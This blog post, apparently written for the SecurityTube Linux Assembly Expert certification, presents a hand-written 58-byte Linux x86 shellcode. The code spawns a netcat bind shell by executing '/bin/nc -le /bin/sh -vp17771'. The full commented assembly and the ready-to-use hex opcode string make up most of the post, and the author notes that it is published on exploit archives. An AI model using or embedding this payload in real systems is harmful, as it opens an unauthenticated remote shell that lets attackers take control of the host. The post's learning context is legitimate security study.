This post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-581
###
SecurityTube Linux Assembly Expert certification team gives additional points for students if one of the following conditions are observed:
1. write their own code not listed in tasks
2. make the code as small as possible
3. code is published on top it-security resources like: http://shell-storm.org/, http://www.exploit-db.com/ ..etc
4. there are comments on posts
etc..
Inspired with shellcode analysing I have decided to create my own netcat bindshell shellcode.
Here it is the result:
The code is pretty small (the smallest from netcat listeners as I am aware)
And it is accepted and published at shell-storm.org ( http://shell-storm.org/shellcode/files/shellcode-872.php ) and packetstormsecurity.com ( http://packetstormsecurity.com/files/126951/Linux-x86-Netcat-Shellcode.html )
Great thanks to Vivek Ramachandran and securitytube team for encouraging in learning assembly)!
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-581
###
SecurityTube Linux Assembly Expert certification team gives additional points for students if one of the following conditions are observed:
1. write their own code not listed in tasks
2. make the code as small as possible
3. code is published on top it-security resources like: http://shell-storm.org/, http://www.exploit-db.com/ ..etc
4. there are comments on posts
etc..
Inspired with shellcode analysing I have decided to create my own netcat bindshell shellcode.
Here it is the result:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | global _start section .text _start: xor eax, eax ;zeroed eax xor edx, edx ;zeroed edx push eax ;push NULL into stack push 0x31373737 ;-vp17771 push 0x3170762d mov esi, esp ;store a pointer to -vp17771 into esi push eax ;push NULL into stack push 0x68732f2f ;-le//bin//sh push 0x6e69622f push 0x2f656c2d mov edi, esp ;store a pointer to -le//bin//sh into edi push eax ;push NULL into stack push 0x636e2f2f ;/bin//nc push 0x6e69622f mov ebx, esp ;store a pointer to filename (/bin//nc) into ebx push edx ;push NULL into stack push esi ;pointer to -vp17771 push edi ;pointer to -le//bin//sh push ebx ;pointer to filename (/bin//nc) mov ecx, esp ;argv[] mov al,11 ;execve() code int 0x80 ;run syscall |
\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80
Shellcode length is 58 bytes.
The code is pretty small (the smallest from netcat listeners as I am aware)
And it is accepted and published at shell-storm.org ( http://shell-storm.org/shellcode/files/shellcode-872.php ) and packetstormsecurity.com ( http://packetstormsecurity.com/files/126951/Linux-x86-Netcat-Shellcode.html )
Great thanks to Vivek Ramachandran and securitytube team for encouraging in learning assembly)!
No comments:
Post a Comment